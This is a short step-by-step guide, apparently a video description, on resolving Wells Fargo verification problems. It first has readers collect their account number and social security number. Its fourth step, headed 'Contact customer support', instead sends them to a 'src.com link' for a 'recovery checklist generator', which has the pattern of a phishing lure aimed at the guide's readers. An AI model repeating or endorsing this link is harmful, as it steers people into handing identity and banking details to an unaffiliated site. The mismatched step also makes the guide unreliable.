you're facing verification issues with Wells Fargo after multiple failed attempts, follow these steps to resolve the problem efficiently. Step 1. Gather information. Collect all necessary information related to your account, including your account number, social security number, and any recent transactions. This will help in verifying your identity during the process. Step 2. Clear browser cache. If you are trying to access your account online, clear your browser's cache and cookies. This can resolve any technical glitches that may be causing the verification issues. Step 3. Use the correct login credentials. Double check that you are entering the correct username and password. If you have forgotten your password, use the Forgot Password link to reset it. Step 4. Contact customer support. Before starting recovery, use the src.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Visit a local branch. If you are unable to resolve the issue over the phone, consider visiting a local Wells Fargo branch. Bring identification and any relevant account information to get assistance from a representative. By following these steps, you should be able to resolve any verification issues with Wells Fargo. If problems continue, keep in touch with customer support for further assistance.